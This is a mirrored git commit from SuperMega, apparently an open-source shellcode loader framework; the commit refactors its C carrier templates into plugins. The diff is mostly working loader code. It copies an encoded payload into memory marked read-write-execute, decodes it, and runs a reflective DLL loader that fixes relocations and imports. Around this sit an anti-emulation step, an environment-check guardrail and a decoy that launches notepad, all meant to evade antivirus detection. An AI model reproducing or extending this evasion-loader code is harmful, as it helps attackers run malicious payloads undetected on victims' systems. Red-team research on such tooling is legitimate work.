mirror of
https://github.com/dobin/SuperMega
synced 2026-06-02 17:27:10 +00:00
refactor: fix carrier & templates (modularize)
This commit is contained in:
Dobin Rutishauser
@@ -17,28 +17,25 @@ char *supermega_payload;
|
||||
|
||||
{{plugin_antiemulation}}
|
||||
|
||||
{{plugin_decoy}}
|
||||
|
||||
{{plugin_executionguardrail}}
|
||||
|
||||
|
||||
int main()
|
||||
{
|
||||
// Execution Guardrail: Env Check
|
||||
wchar_t envVarName[] = L"USERPROFILE";
|
||||
wchar_t tocheck[] = L"C:\\Users\\";
|
||||
WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency!
|
||||
DWORD result = GetEnvironmentVariableW(envVarName, buffer, 1024);
|
||||
if (result == 0) {
|
||||
return 6;
|
||||
}
|
||||
if (mystrcmp(buffer, tocheck) != 0) {
|
||||
return 6;
|
||||
DWORD result;
|
||||
|
||||
// Call: Execution Guardrail
|
||||
if (executionguardrail() != 0) {
|
||||
return 1;
|
||||
}
|
||||
|
||||
// Depends on plugin_antiemulation
|
||||
// Call: Anti Emulation plugin
|
||||
antiemulation();
|
||||
|
||||
// Decoy
|
||||
{{plugin_decoy}}
|
||||
|
||||
//WinExec("C:\\windows\\system32\\notepad.exe", 1);
|
||||
// Call: Decoy plugin
|
||||
decoy();
|
||||
|
||||
// Allocate 1
|
||||
// char *dest = ...
|
||||
@@ -62,13 +59,3 @@ int main()
|
||||
return 0;
|
||||
}
|
||||
|
||||
int mystrcmp(wchar_t* str1, wchar_t* str2) {
|
||||
int i = 0;
|
||||
while (str1[i] != L'\0' && str2[i] != L'\0') {
|
||||
if (str1[i] != str2[i]) {
|
||||
return 1;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
@@ -11,6 +11,11 @@ char *supermega_payload;
|
||||
|
||||
{{plugin_antiemulation}}
|
||||
|
||||
{{plugin_decoy}}
|
||||
|
||||
{{plugin_executionguardrail}}
|
||||
|
||||
|
||||
/* iat_reuse_rx
|
||||
|
||||
Standard IAT reuse shellcode
|
||||
@@ -20,11 +25,18 @@ char *supermega_payload;
|
||||
|
||||
int main()
|
||||
{
|
||||
// Depends on plugin_antiemulation
|
||||
DWORD result;
|
||||
|
||||
// Call: Execution Guardrail
|
||||
if (executionguardrail() != 0) {
|
||||
return 1;
|
||||
}
|
||||
|
||||
// Call: Anti Emulation plugin
|
||||
antiemulation();
|
||||
|
||||
// Decoy
|
||||
{{plugin_decoy}}
|
||||
// Call: Decoy plugin
|
||||
decoy();
|
||||
|
||||
// Allocate 1
|
||||
// char *dest = ...
|
||||
@@ -48,13 +60,3 @@ int main()
|
||||
return 0;
|
||||
}
|
||||
|
||||
int mystrcmp(wchar_t* str1, wchar_t* str2) {
|
||||
int i = 0;
|
||||
while (str1[i] != L'\0' && str2[i] != L'\0') {
|
||||
if (str1[i] != str2[i]) {
|
||||
return 1;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
@@ -15,11 +15,29 @@ char *supermega_payload;
|
||||
* does (rw/rx) -> rwx -> rx
|
||||
*/
|
||||
|
||||
{{plugin_antiemulation}}
|
||||
|
||||
{{plugin_decoy}}
|
||||
|
||||
{{plugin_executionguardrail}}
|
||||
|
||||
|
||||
int main()
|
||||
{
|
||||
DWORD result;
|
||||
char *dest = supermega_payload;
|
||||
|
||||
// Call: Execution Guardrail
|
||||
if (executionguardrail() != 0) {
|
||||
return 1;
|
||||
}
|
||||
|
||||
// Call: Anti Emulation plugin
|
||||
antiemulation();
|
||||
|
||||
// Call: Decoy plugin
|
||||
decoy();
|
||||
|
||||
// Note: RWX if carrier and payload are on the same page (or we cant exec copy..)
|
||||
// can do only RW otherwise?
|
||||
for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) {
|
||||
|
||||
@@ -143,9 +143,29 @@ DWORD_PTR load_dll(LPVOID dllBytes, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
|
||||
}
|
||||
|
||||
|
||||
{{plugin_antiemulation}}
|
||||
|
||||
{{plugin_decoy}}
|
||||
|
||||
{{plugin_executionguardrail}}
|
||||
|
||||
|
||||
int main()
|
||||
{
|
||||
char* dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
|
||||
char* dest = NULL;
|
||||
|
||||
// Call: Execution Guardrail
|
||||
if (executionguardrail() != 0) {
|
||||
return 1;
|
||||
}
|
||||
|
||||
// Call: Anti Emulation plugin
|
||||
antiemulation();
|
||||
|
||||
// Call: Decoy plugin
|
||||
decoy();
|
||||
|
||||
dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
|
||||
|
||||
// FROM supermega_payload[]
|
||||
// TO dest[]
|
||||
|
||||
@@ -122,8 +122,6 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
|
||||
for (DWORD i = 0; i < relocationsCount; i++)
|
||||
{
|
||||
relocationsProcessed += sizeof(BASE_RELOCATION_ENTRY);
|
||||
|
||||
// THIZ
|
||||
if (relocationEntries[i].Type == 0)
|
||||
{
|
||||
continue;
|
||||
@@ -134,15 +132,11 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
|
||||
//ReadProcessMemory(GetCurrentProcess(), (LPCVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR), NULL);
|
||||
DWORD_PTR* addressToPatch = (DWORD_PTR*)((BYTE*)dllBase + relocationRVA);
|
||||
//DWORD_PTR value = *addressToPatch;
|
||||
|
||||
*addressToPatch += deltaImageBase;
|
||||
//mymemcpy((PVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR));
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
MessageBoxW(0, L"AAA2", L"AAA2", MB_OK);
|
||||
|
||||
// resolve import address table
|
||||
PIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL;
|
||||
IMAGE_DATA_DIRECTORY importsDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
|
||||
@@ -187,26 +181,35 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
|
||||
}
|
||||
|
||||
|
||||
{{plugin_antiemulation}}
|
||||
|
||||
{{plugin_decoy}}
|
||||
|
||||
{{plugin_executionguardrail}}
|
||||
|
||||
|
||||
int main()
|
||||
{
|
||||
// char* dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
|
||||
//char* dest = VirtualAlloc(0, 0x7000, 0x3000, PAGE_EXECUTE_READWRITE);
|
||||
char* dest = supermega_payload;
|
||||
DWORD protect, oldProtect;
|
||||
protect = PAGE_EXECUTE_READWRITE;
|
||||
VirtualProtect((LPVOID)dest, 0x7000, protect, &oldProtect);
|
||||
|
||||
MessageBoxW(0, L"ok virtualprotect", L"AAA2", MB_OK);
|
||||
// Call: Execution Guardrail
|
||||
if (executionguardrail() != 0) {
|
||||
return 1;
|
||||
}
|
||||
|
||||
// Call: Anti Emulation plugin
|
||||
antiemulation();
|
||||
|
||||
// Call: Decoy plugin
|
||||
decoy();
|
||||
|
||||
VirtualProtect((LPVOID)dest, 0x7000, PAGE_EXECUTE_READWRITE, &oldProtect);
|
||||
|
||||
// FROM supermega_payload[]
|
||||
// TO dest[]
|
||||
// Including decryption
|
||||
{{ plugin_decoder }}
|
||||
|
||||
|
||||
MessageBoxW(0, L"ok copy", L"AAA2", MB_OK);
|
||||
|
||||
{{ plugin_decoder }}
|
||||
|
||||
// Load the DLL at dest
|
||||
DWORD_PTR dllBase;
|
||||
|
||||
@@ -0,0 +1,4 @@
|
||||
|
||||
void decoy() {
|
||||
// None
|
||||
}
|
||||
@@ -1 +1,4 @@
|
||||
WinExec("C:\\windows\\system32\\notepad.exe", 1);
|
||||
|
||||
void decoy() {
|
||||
WinExec("C:\\windows\\system32\\notepad.exe", 1);
|
||||
}
|
||||
|
||||
@@ -1,3 +1,18 @@
|
||||
|
||||
|
||||
int mystrcmp(wchar_t* str1, wchar_t* str2) {
|
||||
int i = 0;
|
||||
while (str1[i] != L'\0' && str2[i] != L'\0') {
|
||||
if (str1[i] != str2[i]) {
|
||||
return 1;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
int executionguardrail() {
|
||||
// Execution Guardrail: Env Check
|
||||
wchar_t envVarName[] = L"USERPROFILE";
|
||||
wchar_t tocheck[] = L"C:\\Users\\";
|
||||
@@ -8,4 +23,7 @@
|
||||
}
|
||||
if (mystrcmp(buffer, tocheck) != 0) {
|
||||
return 6;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
@@ -0,0 +1,3 @@
|
||||
int executionguardrail() {
|
||||
// None
|
||||
}
|
||||
+1
-1
@@ -67,7 +67,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
|
||||
'plugin_decoder': plugin_decoder,
|
||||
'plugin_antiemulation': plugin_antiemualation,
|
||||
'plugin_decoy': plugin_decoy,
|
||||
'plugin_guardrails': plugin_guardrails,
|
||||
'plugin_executionguardrail': plugin_guardrails,
|
||||
'PAYLOAD_LEN': payload_len,
|
||||
})
|
||||
with open(settings.main_c_path, "w", encoding='utf-8') as file:
|
||||
|
||||
Reference in New Issue
Block a user